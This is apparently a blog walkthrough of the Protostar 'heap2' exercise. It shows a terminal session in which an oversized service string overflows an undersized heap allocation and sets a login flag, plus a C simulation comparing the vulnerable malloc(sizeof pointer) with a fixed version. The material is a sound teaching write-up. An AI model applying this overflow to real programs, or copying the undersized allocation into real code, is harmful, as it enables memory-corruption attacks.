Tuesday, December 23, 2014

Protostar - Heap #2

About:

This level examines what can happen when heap pointers are stale. This level is completed when you see the “you have logged in already!” message.


Source Code:



Solution:

For heap2, our goal is to set the auth->auth integer to a non-zero value.

We can do this by using the "service" command and sending in an oversized service value.

First, let's get addresses for where these objects are allocated:

user@protostar:/opt/protostar/bin$ ./heap2
[ auth = (nil), service = (nil) ]
auth a
[ auth = 0x804c008, service = (nil) ]
service a
[ auth = 0x804c008, service = 0x804c018 ]

OK, so service is allocated 0x10 bytes past auth. If we send a service value of 0x10 bytes or more, it should run over the auth object and set auth->auth to a non-zero value.

user@protostar:/opt/protostar/bin$ ./heap2
[ auth = (nil), service = (nil) ]
auth a
[ auth = 0x804c008, service = (nil) ]
service aaaaaaaaaaaaaaaa
[ auth = 0x804c008, service = 0x804c018 ]
login
you have logged in already!

Success!
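Why sixteen bytes of service reach the flag, as an added C model that is not part of the original writeup: heap2 allocates auth with malloc(sizeof(auth)), the size of the pointer rather than of the struct (the level's source is not reproduced above), so the auth field at offset 32 sits in whatever chunk malloc hands out next, here the service string. The struct layout is taken from the level's source; the arena allocator, run_level and the two login_flag helpers are constructed for this demonstration and stand in for the real heap, whose 16-byte spacing they mimic.

```c
#include <stdlib.h>
#include <string.h>
/* Record layout used by heap2 (its source is not reproduced on this page):
 * a 32-byte name followed by the integer that "login" tests. */
struct auth {
    char name[32];
    int  auth;
};

/* Bump allocator over a small arena that mimics the spacing printed above:
 * requests round up to 16 bytes, so the undersized auth chunk (0x804c008) is
 * immediately followed by the service string (0x804c018). */
static unsigned char *heap;             /* 256-byte arena, allocated once */
static size_t heap_top;

static void sim_reset(void)
{
    if (!heap && !(heap = malloc(256))) abort();
    memset(heap, 0, 256);
    heap_top = 0;
}
static void *sim_malloc(size_t n)
{
    size_t rounded = (n + 15) & ~(size_t)15;   /* 16-byte chunk granularity */
    if (heap_top + rounded > 256) return NULL;
    void *p = heap + heap_top;
    heap_top += rounded;
    return p;
}

/* Replays "auth a", "service <arg>", "login" with auth allocated at
 * auth_alloc bytes; returns what login tests (auth->auth), -1 on failure. */
int run_level(size_t auth_alloc, const char *service_arg)
{
    sim_reset();
    struct auth *auth = sim_malloc(auth_alloc);
    char *service = sim_malloc(strlen(service_arg) + 1); /* strdup(line + 7) */
    if (!auth || !service) return -1;
    memset(auth, 0, auth_alloc);        /* zeroes only the bytes actually owned */
    strcpy(auth->name, "a");
    strcpy(service, service_arg);       /* text after "service", space included */
    return auth->auth;
}

/* Vulnerable: malloc(sizeof(auth)) sizes the chunk by the pointer, so
 * auth->auth (offset 32) lives in whatever chunk is handed out next. */
int vulnerable_login_flag(const char *s) { return run_level(sizeof(struct auth *), s); }

/* Fixed: malloc(sizeof *auth) covers every field, so no service string,
 * however long, reaches the flag. */
int fixed_login_flag(const char *s) { return run_level(sizeof(struct auth), s); }
```

The service argument starts with the space that follows the word "service" on the input line, exactly as strdup(line + 7) copies it, so sixteen a's are what it takes for the copy to land on the flag.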
